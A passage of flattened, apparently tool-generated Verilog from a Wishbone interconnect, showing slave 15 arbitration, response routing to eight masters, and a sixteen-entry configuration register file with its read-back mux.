    always @ (  ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) or  m0_s15_cyc_o or  m1_s15_cyc_o or  m2_s15_cyc_o or  m3_s15_cyc_o or  m4_s15_cyc_o or  m5_s15_cyc_o or  m6_s15_cyc_o or  m7_s15_cyc_o or  s15_m0_cyc_r or  s15_m1_cyc_r or  s15_m2_cyc_r or  s15_m3_cyc_r or  s15_m4_cyc_r or  s15_m5_cyc_r or  s15_m6_cyc_r or  s15_m7_cyc_r)
    begin
        case ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s15_wb_cyc_o = ( m0_s15_cyc_o & s15_m0_cyc_r );
        end
        3'd1:
        begin
            s15_wb_cyc_o = ( m1_s15_cyc_o & s15_m1_cyc_r );
        end
        3'd2:
        begin
            s15_wb_cyc_o = ( m2_s15_cyc_o & s15_m2_cyc_r );
        end
        3'd3:
        begin
            s15_wb_cyc_o = ( m3_s15_cyc_o & s15_m3_cyc_r );
        end
        3'd4:
        begin
            s15_wb_cyc_o = ( m4_s15_cyc_o & s15_m4_cyc_r );
        end
        3'd5:
        begin
            s15_wb_cyc_o = ( m5_s15_cyc_o & s15_m5_cyc_r );
        end
        3'd6:
        begin
            s15_wb_cyc_o = ( m6_s15_cyc_o & s15_m6_cyc_r );
        end
        3'd7:
        begin
            s15_wb_cyc_o = ( m7_s15_cyc_o & s15_m7_cyc_r );
        end
        endcase
    end
    always @ (  ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) or  ( ( ( m0_slv_sel == 4'd15 ) ) ? ( m0_stb_i ) : ( 1'b0 ) ) or  ( ( ( m1_slv_sel == 4'd15 ) ) ? ( m1_stb_i ) : ( 1'b0 ) ) or  ( ( ( m2_slv_sel == 4'd15 ) ) ? ( m2_stb_i ) : ( 1'b0 ) ) or  ( ( ( m3_slv_sel == 4'd15 ) ) ? ( m3_stb_i ) : ( 1'b0 ) ) or  ( ( ( m4_slv_sel == 4'd15 ) ) ? ( m4_stb_i ) : ( 1'b0 ) ) or  ( ( ( m5_slv_sel == 4'd15 ) ) ? ( m5_stb_i ) : ( 1'b0 ) ) or  ( ( ( m6_slv_sel == 4'd15 ) ) ? ( m6_stb_i ) : ( 1'b0 ) ) or  ( ( ( m7_slv_sel == 4'd15 ) ) ? ( m7_stb_i ) : ( 1'b0 ) ))
    begin
        case ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s15_wb_stb_o = ( ( ( m0_slv_sel == 4'd15 ) ) ? ( m0_stb_i ) : ( 1'b0 ) );
        end
        3'd1:
        begin
            s15_wb_stb_o = ( ( ( m1_slv_sel == 4'd15 ) ) ? ( m1_stb_i ) : ( 1'b0 ) );
        end
        3'd2:
        begin
            s15_wb_stb_o = ( ( ( m2_slv_sel == 4'd15 ) ) ? ( m2_stb_i ) : ( 1'b0 ) );
        end
        3'd3:
        begin
            s15_wb_stb_o = ( ( ( m3_slv_sel == 4'd15 ) ) ? ( m3_stb_i ) : ( 1'b0 ) );
        end
        3'd4:
        begin
            s15_wb_stb_o = ( ( ( m4_slv_sel == 4'd15 ) ) ? ( m4_stb_i ) : ( 1'b0 ) );
        end
        3'd5:
        begin
            s15_wb_stb_o = ( ( ( m5_slv_sel == 4'd15 ) ) ? ( m5_stb_i ) : ( 1'b0 ) );
        end
        3'd6:
        begin
            s15_wb_stb_o = ( ( ( m6_slv_sel == 4'd15 ) ) ? ( m6_stb_i ) : ( 1'b0 ) );
        end
        3'd7:
        begin
            s15_wb_stb_o = ( ( ( m7_slv_sel == 4'd15 ) ) ? ( m7_stb_i ) : ( 1'b0 ) );
        end
        endcase
    end
    assign s15_m0_ack_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & rf_i_wb_ack_o );
    assign s15_m1_ack_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & rf_i_wb_ack_o );
    assign s15_m2_ack_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & rf_i_wb_ack_o );
    assign s15_m3_ack_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & rf_i_wb_ack_o );
    assign s15_m4_ack_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & rf_i_wb_ack_o );
    assign s15_m5_ack_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & rf_i_wb_ack_o );
    assign s15_m6_ack_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & rf_i_wb_ack_o );
    assign s15_m7_ack_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & rf_i_wb_ack_o );
    assign s15_m0_err_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & rf_i_wb_err_o );
    assign s15_m1_err_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & rf_i_wb_err_o );
    assign s15_m2_err_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & rf_i_wb_err_o );
    assign s15_m3_err_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & rf_i_wb_err_o );
    assign s15_m4_err_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & rf_i_wb_err_o );
    assign s15_m5_err_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & rf_i_wb_err_o );
    assign s15_m6_err_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & rf_i_wb_err_o );
    assign s15_m7_err_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & rf_i_wb_err_o );
    assign s15_m0_rty_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd0 ) & rf_i_wb_rty_o );
    assign s15_m1_rty_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd1 ) & rf_i_wb_rty_o );
    assign s15_m2_rty_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd2 ) & rf_i_wb_rty_o );
    assign s15_m3_rty_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd3 ) & rf_i_wb_rty_o );
    assign s15_m4_rty_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd4 ) & rf_i_wb_rty_o );
    assign s15_m5_rty_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd5 ) & rf_i_wb_rty_o );
    assign s15_m6_rty_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd6 ) & rf_i_wb_rty_o );
    assign s15_m7_rty_o = ( ( ( ( ( s15_pri_sel == 2'd0 ) ) ? ( s15_arb_state ) : ( ( ( ( s15_msel_pri_sel == 2'd0 ) ) ? ( s15_msel_arb0_state ) : ( ( ( ( s15_msel_pri_sel == 2'd1 ) ) ? ( s15_msel_sel1 ) : ( s15_msel_sel2 ) ) ) ) ) ) == 3'd7 ) & rf_i_wb_rty_o );
    assign rf_i_wb_cyc_i = s15_wb_cyc_o;
    assign s15_data_o = s15_wb_data_o;
    assign s15_addr_o = s15_wb_addr_o;
    assign s15_sel_o = s15_wb_sel_o;
    assign s15_we_o = s15_wb_we_o;
    assign s15_cyc_o = ( ( ( ( rf_i_wb_cyc_i & rf_i_wb_stb_i ) & ( rf_i_wb_addr_i[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) ) ? ( 1'b0 ) : ( s15_wb_cyc_o ) );
    assign s15_stb_o = s15_wb_stb_o;
    always @ (  posedge clk_i)
    begin
        rf_rf_we <= ( ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) & s15_wb_we_o ) &  !( rf_rf_we) );
    end
    always @ (  posedge clk_i)
    begin
        rf_rf_ack <= ( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) ) &  !( rf_rf_ack) );
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf0 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd0 ) ) 
            begin
                rf_conf0 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf1 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd1 ) ) 
            begin
                rf_conf1 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf2 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd2 ) ) 
            begin
                rf_conf2 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf3 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd3 ) ) 
            begin
                rf_conf3 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf4 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd4 ) ) 
            begin
                rf_conf4 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf5 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd5 ) ) 
            begin
                rf_conf5 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf6 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd6 ) ) 
            begin
                rf_conf6 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf7 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd7 ) ) 
            begin
                rf_conf7 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf8 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd8 ) ) 
            begin
                rf_conf8 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf9 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd9 ) ) 
            begin
                rf_conf9 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf10 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd10 ) ) 
            begin
                rf_conf10 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf11 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd11 ) ) 
            begin
                rf_conf11 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf12 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd12 ) ) 
            begin
                rf_conf12 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf13 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd13 ) ) 
            begin
                rf_conf13 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf14 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd14 ) ) 
            begin
                rf_conf14 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            rf_conf15 <= 16'h0;
        end
        else
        begin 
            if ( rf_rf_we & ( s15_wb_addr_o[5:2] == 4'd15 ) ) 
            begin
                rf_conf15 <= s15_wb_data_o[15:0];
            end
        end
    end
    always @ (  posedge clk_i)
    begin
        if (  !( ( ( s15_wb_cyc_o & s15_wb_stb_o ) & ( s15_wb_addr_o[( rf_aw - 5 ):( rf_aw - 8 )] == rf_rf_addr ) )) ) 
        begin
            rf_rf_dout <= 16'h0;
        end
        else
        begin 
            case ( s15_wb_addr_o[5:2] ) 
            4'd0:
            begin
                rf_rf_dout <= rf_conf0;
            end
            4'd1:
            begin
                rf_rf_dout <= rf_conf1;
            end
            4'd2:
            begin
                rf_rf_dout <= rf_conf2;
            end
            4'd3:
            begin
                rf_rf_dout <= rf_conf3;
            end
            4'd4:
            begin
                rf_rf_dout <= rf_conf4;
            end
            4'd5:
            begin
                rf_rf_dout <= rf_conf5;
            end
            4'd6:
            begin
                rf_rf_dout <= rf_conf6;
            end
            4'd7:
            begin
                rf_rf_dout <= rf_conf7;
            end
            4'd8:
            begin
                rf_rf_dout <= rf_conf8;
            end
            4'd9:
            begin
                rf_rf_dout <= rf_conf9;
            end
            4'd10:
            begin
                rf_rf_dout <= rf_conf10;
            end
            4'd11:
            begin
                rf_rf_dout <= rf_conf11;
            end
            4'd12:
            begin
                rf_rf_dout <= rf_conf12;
            end
            4'd13:
            begin
                rf_rf_dout <= rf_conf13;
            end
            4'd14:
            begin
                rf_rf_dout <= rf_conf14;
            end
            4'd15:
            begin
                rf_rf_dout <= rf_conf15;
            end
            endcase
        end
    end
endmodule 


